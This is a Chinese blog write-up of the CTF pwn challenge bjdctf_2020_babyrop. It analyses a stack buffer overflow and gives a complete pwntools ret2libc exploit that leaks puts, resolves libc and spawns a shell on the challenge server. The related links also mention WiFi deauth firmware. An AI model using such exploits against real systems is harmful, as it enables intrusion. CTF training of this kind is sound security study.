buuctf pwn bjdctf_2020_babyrop

最新推荐文章于 2023-05-09 10:17:32 发布
最新推荐文章于 2023-05-09 10:17:32 发布
阅读量287 收藏
点赞数
分类专栏: Pwn 文章标签: 安全 ctf pwn
版权声明:本文为博主原创文章,遵循 CC 4.0 BY 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/MrTreebook/article/details/124764723
版权

buuctf pwn bjdctf_2020_babyrop

1.checksec

checksec

  • 运行一下
    在这里插入图片描述

2.IDA分析

在这里插入图片描述

  • 这里调用了vuln函数
  • 我们接着看一下vuln函数
    在这里插入图片描述
  • buf只有32,但是我们可以写64
  • 很明显的溢出
  • 本程序没开PIE
  • 没开canary
  • 再看一下有没有后门函数
    在这里插入图片描述
  • 没有"/bin/sh"
  • 没有system()函数
  • 那么就要通过泄露函数地址来计算libc的基地址了
  • 64位程序在传参的时候需要用到寄存器
  • 当参数少于7个时, 参数从左到右放入寄存器: rdi, rsi, rdx, rcx, r8, r9。
  • 当参数为7个以上时,后面的依次从 “右向左” 放入栈中。
  • 设置rdi寄存器的指令

ropper

在这里插入图片描述

3.exp

from pwn import *
from LibcSearcher import *

r = remote('node3.buuoj.cn',28514)
elf = ELF('./bjdctf_2020_babyrop')
context.log_level = 'debug'

main = elf.sym['main']
puts_plt = elf.plt['puts']
puts_got = elf.got['puts']
pop_rdi = 0x0000000000400733
# 这个题目的输出函数是puts()所以传参只需要传一个
payload = b'a' * (0x20+8) + p64(pop_rdi) + p64(puts_got) +p64(puts_plt) + p64(main)
r.recvuntil('Pull up your sword and tell me u story!')
r.sendline(payload)
r.recv()
puts_addr = u64(r.recv(6).ljust(8,'\x00'))
libc = LibcSearcher('puts',puts_addr)
#计算system和bin/sh的实际地址
offset = puts_addr-libc.dump('puts')
system = offset+libc.dump('system')
bin_sh = offset+libc.dump('str_bin_sh')

payload=b'a' * (0x20+8) + p64(pop_rdi) + p64(bin_sh) + p64(system)
r.recvuntil('Pull up your sword and tell me u story!')
r.sendline(payload)

r.interactive()
==Microsoft==
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
Wi-PWN_8.0_ENGLISH.bin
08-25
ESP8266的WIFI杀手固件,这是不带显示的。 我后续更新带OLED显示的固件。教程后将更新。
Wi-PWN_8.0_ENGLISH_OLED.bin
08-25
这是ESP8266的带OLED显示的WIFI杀手固件。
BUUCTF bjdctf_2020_babyrop
红叶的博客
10-27 766
今天终于搞明白 ret2libc3 了,不过不知道为什么所有 包括我自己写的PoC,都不能成功获取 ret2libc3 的shell,因此就去做BUUCTF的题了,边看大佬的解析边做。至此 system、/bin/sh 的地址就已经拿到了,只需要重新溢出一次程序,使用刚才获取的地址即可。因为没有开PIE,因此地址是固定的。使用 1 的 Libc 即可获取shell。ROPgadget找pop rdi。gdb动态调试查看需要覆盖的数量。打开IDA Pro看一眼。ret2libc的做法。首先checksec。
[BUUCTF-pwn]——bjdctf_2020_babyrop
Y_peak的博客
02-12 287
[BUUCTF-pwn]——bjdctf_2020_babyrop 题目地址:https://buuoj.cn/challenges#bjdctf_2020_babyrop 还是先checksec 一下 在IDA中看看 利用泄露地址和LibcSearcher库,找到对应的 libc版本算对偏移就可以找到system函数和 ‘/bin/sh’ 字符串. 因为64位,所以找下pop指令 思路: 泄露任意函数地址, 找到对应libc版本, 利用偏移寻找system函数和 ‘/bin/sh’ 字符串.
BUUCTF-Pwn-bjdctf_2020_babyrop
餐桌上的猫
03-25 359
exp from pwn import* from LibcSearcher import * p=process('/home/lhb/桌面/bjdctf_2020_babyrop') elf=ELF('/home/lhb/桌面/bjdctf_2020_babyrop') p=remote('node4.buuoj.cn',27346) main=0x4006ad pop_rdi_ret=0x400733 puts_plt=elf.plt['puts'] puts_got=elf.got['puts']
【CTF】【PWN】【BJDctf】bjd_2020_babyheap
m0_50819561的博客
10-06 155
一道比较简单的堆题。 经典列菜单。 create , edit, delete 。 可以发现edit存在一个堆溢出漏洞,那么利用方法就很明显了。 先创建4个chunk。 再删除chunk2,然后对chunk1进行edit,利用堆溢出将chunk2的fd填充为一个fake_chunk. 再次malloc就会申请回chunk2的位置,由于fd连接了fake_chunk,所以再申请一次会申请会fake_chunk. fake_chunk+0x23的位置是heaparrary。 所以,执行如上代码之后,h
[BUUCTF]PWN——bjdctf_2020_router
mcmuyanga的博客
11-06 928
bjdctf_2020_router 附件 步骤: 例行检查,64位程序,开启了NX保护 本地试运行一下程序,看看大概的情况 会让我们选择,选择4.root,没什么用,但是注意了,这边选1会执行ping命令,尝试在ping命令后拼接ls,可以看到ls命令也执行了 这边利用了linux下的命令机制,命令1+;+命令2 这样的格式两种指令都会执行 3 . 利用这点,远程连接,尝试读出flag ...
PWM.rar_ARM7 汇编_PWN_pwm arm7
09-22
ARM7下PWN接口的使用源码,包含C语言及汇编
PWN.rar_AVR PWM_GPS FPGA_PWN_avr_avr pwn
09-23
AVR系列单片机Mage8PWM脉冲输出程序
buuctf pwn ubuntu20的自己搭建运行环境
11-15
pwn ubuntu20的自己搭建运行环境具体情参考https://blog.csdn.net/weixin_41748164/article/details/127874334
pwn7第七关
qq_18823653的博客
04-03 385
前面几个懒得写了,直接第七个吧,溢出点和前面一样get()函数,112字节,保护只开了NX程序本身没有system(),也没有/bin/sh,且栈不可执行,用ROPgadget也没找到有用的语句,但是程序是动态链接的,运行时会加载so库,可以用put()泄露出put的真实地址,又因为ASLR随机化不了地址底12位,可以用put真实地址的底12位查询加载的那个版本的libc.so,以及确定libc的...
BUUCTF pwn——bjdctf_2020_router
CNS-Enterprise BCC-1701-J
05-09 229
BUUCTF 做题练习
[BUUCTF-pwn]——bjdctf_2020_babystack
Y_peak的博客
02-10 346
[BUUCTF-pwn]——bjdctf_2020_babystack 题目地址:https://buuoj.cn/challenges#bjdctf_2020_babystack Linux中checksec一下 , 64位的我们要小心参数小于6位的函数. IDA中看看 看到这里不用我多说了吧, So easy !!! exploit from pwn import * p = remote("node3.buuoj.cn",25355) sys = 0x04006EA p.sendlinea
BJDCTF2020 babyrouter
qq_39980610的博客
08-22 215
BJDCTF2020 babyrouter
[BUUCTF]PWN——bjdctf_2020_babyrop
mcmuyanga的博客
10-07 2848
bjdctf_2020_babyrop[64位libc泄露] 题目附件 解题步骤: 例行检查,64位程序,开启了NX保护 试运行一下程序,看看大概的情况,看提示,应该是道泄露libc的题目 64位ida载入,shift+f12检索程序里的字符串,没有找到可以直接使用的system(’/bin/sh’) 从main函数开始看程序 main函数调用了一个vuln函数 buf的大小是0x20,read读入的长度是0x64,明显的溢出漏洞 根据已有的信息和得到的提示,是一道64位的libc泄露 利用思路:
ctfshow BJDCTF2020 encode wp
qq_73667990的博客
02-17 262
进入sub_8048AC2,base加密的代码看多了一眼就认出了这是base加密,蓝色的a0123456789Abcd就是密码表双击进入得到密码表。不知为何我的ida插件Findcrypto识别不出来Base和RC4加密。v5[18]是加密数据,v4是长度,v5是密钥,v3是v5长度。再进入sub_8048E24,是一个rc4加密。密钥v5=Flag{This_a_Flag}根据代码推测函数,鼠标放到函数上N键重命名。然后再base解密得到falg。可知RC4加密后的字符串为。得到了异或后的v5[18]
第二届 BJDCTF 2020 Pwn Writeup (出题人版)
HiTaQini
04-01 1813
最为第一届BJDCTF的参赛选手和本届比赛的二进制出题人+运维,真心祝愿BJDCTF越办越好!(说多了怕被打)
BJDCTF2020 dizzy
qq_39980610的博客
08-22 291
BJDCTF2020dizzy
我要学pwn.day15
weixin_45963786的博客
07-26 507
bjdctf_2020_babyrop 潜心修炼,从基础开始 这是一道基础ROP题 解题流程 1.查看文件保护 $ checksec bjdctf_2020_babyrop [*] '/home/ctf/Downloads/pwnexercise/2018_rop/bjdctf_2020_babyrop' Arch: amd64-64-little RELRO: Partial RELRO Stack: No canary found NX:
BUUCTF pwn rip
最新发布
01-28
根据提供的引用内容,BUUCTF PWN-RIP是一个关于PWN技术的详解文章。文章中提到了64位的EIF文件中rbp寄存器的大小为8个字节。如果对这部分不太理解,可以阅读作者的另一篇关于PWN基础知识的文章。 BUUCTF PWN-RIP...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

==Microsoft==

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值